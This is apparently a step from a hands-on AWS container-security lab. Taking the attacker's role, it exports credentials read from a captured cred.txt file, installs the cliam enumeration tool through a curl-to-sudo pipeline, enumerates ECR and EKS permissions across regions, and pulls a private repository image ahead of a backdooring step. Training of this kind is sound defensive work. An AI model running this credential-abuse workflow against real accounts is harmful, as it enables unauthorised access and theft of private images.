Enumerate ECR repositories using credentials

⚡ Attention ⚡

💡 Do not switch terminals unless stated below, or you'll need to re-export environment variables.

🛠️ Customization Notice 🛠️

🔧 These commands are tailored for this lab. Adapt them for your specific use case.

• Change directory

cd /workspaces/ecr_eks_security_masterclass_public/eks/jenkins_cve 

• Again export the credentials.

export AWS_ACCESS_KEY_ID=$(grep -oP '(?<="AccessKeyId" : ")[^"]*' cred.txt) \
&& export AWS_SECRET_ACCESS_KEY=$(grep -oP '(?<="SecretAccessKey" : ")[^"]*' cred.txt) \
&& export AWS_SESSION_TOKEN=$(grep -oP '(?<="Token" : ")[^"]*' cred.txt)

• Enumerate IAM using Securisec/cliam

curl -L https://github.com/securisec/cliam/releases/download/2.2.0/cliam-linux-64bit.tar.gz | tar -xz && sudo mv cliam /usr/local/bin/ && sudo chmod +x /usr/local/bin/cliam 

• Let's enumerate the permissions manually.

As this lab is related to EKS & ECR, we will directly enumerate these services.

aws ecr describe-repositories
aws ecr describe-registry
aws eks list-clusters 

• Let' use cliam to enumerate the permissions of eks & ecr.

cliam aws enumerate --access-key-id $AWS_ACCESS_KEY_ID --secret-access-key $AWS_SECRET_ACCESS_KEY --session-token $AWS_SESSION_TOKEN ecr

cliam aws enumerate --access-key-id $AWS_ACCESS_KEY_ID --secret-access-key $AWS_SECRET_ACCESS_KEY --session-token $AWS_SESSION_TOKEN eks

• Let's again run the cliam command and review the changes in the command mentioned below for both services.

for region in us-east-1 us-west-2; do cliam aws enumerate --access-key-id "$AWS_ACCESS_KEY_ID" --secret-access-key "$AWS_SECRET_ACCESS_KEY" --session-token "$AWS_SESSION_TOKEN" ecr --region $region; done

for region in us-east-1 us-west-2; do cliam aws enumerate --access-key-id "$AWS_ACCESS_KEY_ID" --secret-access-key "$AWS_SECRET_ACCESS_KEY" --session-token "$AWS_SESSION_TOKEN" eks --region $region; done

• Set the default region using one-liner before proceeding further.

This will set the default region based on output.

for region in us-east-1 us-west-2; do
  output=$(cliam aws enumerate --access-key-id "$AWS_ACCESS_KEY_ID" --secret-access-key "$AWS_SECRET_ACCESS_KEY" --session-token "$AWS_SESSION_TOKEN" ecr --region $region)
  
  if echo "$output" | grep -q "INF"; then
    echo "Setting region $region as default"
    export AWS_DEFAULT_REGION=$region
    break
  fi
done

• Using describe repo, list the image from ecr.

export repo=$(aws ecr describe-repositories --query 'repositories[0].repositoryName' --output text) && aws ecr list-images --repository-name "$repo"

• Similarly list the cluster running.

The cluster starting with peachycloudsecurity-<randomvalue> is lab cluster.

aws eks list-clusters 

• Pull the image from the ECR repository. Also get the current image tag.

As we dont' know as attacker what tag is used in the image, we are using aws ecr list-images and getiting the latest tag.

export repo=$(aws ecr describe-repositories --query 'repositories[0].repositoryUri' --output text) && export image=$(aws ecr list-images --repository-name $(echo $repo | cut -d'/' -f2) --query 'imageIds[0].imageTag' --output text) 

docker pull "$repo:$image"

• As the tag has been identified in the image, in this case it is latest
  • Pull the same image with latest image tag to demonstrate attacker can first get the correct tag and pull the image.
  • The attacker can also try to guess and pull other image tags using common naming patterns.

In real life, the tag of a Docker image can change depending on the organization. An attacker can pull the image and then tag it with the same Docker image tag.

repo=$(aws ecr describe-repositories --query 'repositories[0].repositoryUri' --output text)
image_tag="latest"
docker pull "$repo:$image_tag"

• Next step is to generate the backdoored image. Follow next section of the lab.

Credit

• Redbubble Meme
• msn.com